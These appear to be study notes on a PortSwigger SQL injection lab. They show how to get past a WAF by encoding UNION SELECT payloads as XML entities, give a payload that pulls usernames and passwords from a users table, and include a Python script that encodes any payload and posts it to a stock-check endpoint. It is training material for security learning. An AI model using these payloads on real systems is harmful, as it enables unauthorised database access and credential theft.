# SQLi in different contexts
---
- In all of the labs so far, you've used the query string to inject your malicious SQL payload. 
- However, it's **important** to note that you can _perform SQLi attacks_ using _any controllable input that is processed as a SQL query_ by the application. 
- **For example**, some websites take input in _JSON_ or _XML_ format and use this to query the database.

- _These different formats_ may even provide alternative ways for you to [obfuscate attacks](https://portswigger.net/web-security/essential-skills/obfuscating-attacks-using-encodings#obfuscation-via-xml-encoding) that are _otherwise blocked due to WAFs_ and other defense mechanisms.
- Weak implementations often just look for common SQLi keywords within the request.
- So you may be able to _bypass these filters_ by simply _encoding_ or _escaping characters_ in the prohibited keywords.

For example, the following XML-based SQLi uses an XML escape sequence to encode the `s` character in `SELECT`:
```xml
<stockCheck> 
	<productId> 
		123 
	</productId> 
	<storeId> 
		999 &#x53;ELECT * FROM information_schema.tables 
	</storeId> 
</stockCheck>
```
This will be decoded server-side before being passed to the SQL interpreter.

# Lab: SQL injection with filter bypass via XML encoding
---
1. Observe that the stock check feature sends the `productId` and `storeId` to the application in XML format.
2. Send the `POST /product/stock` request to Burp Repeater.
3. In Burp Repeater, probe the `storeId` to see whether your input is evaluated. 
    - For example, try replacing the ID with mathematical expressions that evaluate to other potential IDs, for example:
    - `<storeId>1+1</storeId>`
4. Observe that your input appears to be evaluated by the application, returning the stock for different stores.
5. Try determining the number of columns returned by the original query by appending a `UNION SELECT` statement to the original store ID:  
    - `<storeId>1 UNION SELECT NULL</storeId>`
6. Observe that your request has been blocked due to being flagged as a potential attack.
7. As you're _injecting into XML_, try _obfuscating_ your payload using [XML entities](https://portswigger.net/web-security/xxe/xml-entities). 
	-  One way to do this is using the [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) extension. 
	- Just highlight your input, right-click, then select **Extensions > Hackvertor > Encode > dec_entities/hex_entities**.
8. Resend the request and notice that you now receive a normal response from the application. 
	- This suggests that you have _successfully bypassed the WAF_.
9. Pick up where you left off, and deduce that the query returns a single column. When you try to return more than one column, the application returns `0 units`, implying an error.
10. As you can only return one column, you need to concatenate the returned usernames and passwords, for example:
    - `<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>`
11. Send this query and observe that you've successfully fetched the usernames and passwords from the database, separated by a `~` character.
12. Use the administrator's credentials to log in and solve the lab.

```python
#!/usr/bin/env python3
# SQL injection with filter bypass via XML encoding
import requests
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def list_to_string(string):
    str1 = ""
    for ele in string:
        str1 += ele
    return str1

def html_entity(payload):
    string = list()
    for i in payload:
        enc = f"&#x{format(ord(i), 'x')};"
        string.append(enc)
    payload = list_to_string(string)
    return payload

def send_payload(url, payload):
    param = "/product/stock"
    xml = f'<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1{payload}</storeId></stockCheck>'
    req = requests.post(url+param, data=xml, verify=False, proxies=p)
    return req.text

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        payload = sys.argv[2].strip()
        
        x = html_entity(payload)
        print(send_payload(url, x))

    except IndexError:
        print("[-] Usage: {} <url> <payload>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com 'ORDER BY 1'".format(sys.argv[0]))
        sys.exit(1)
```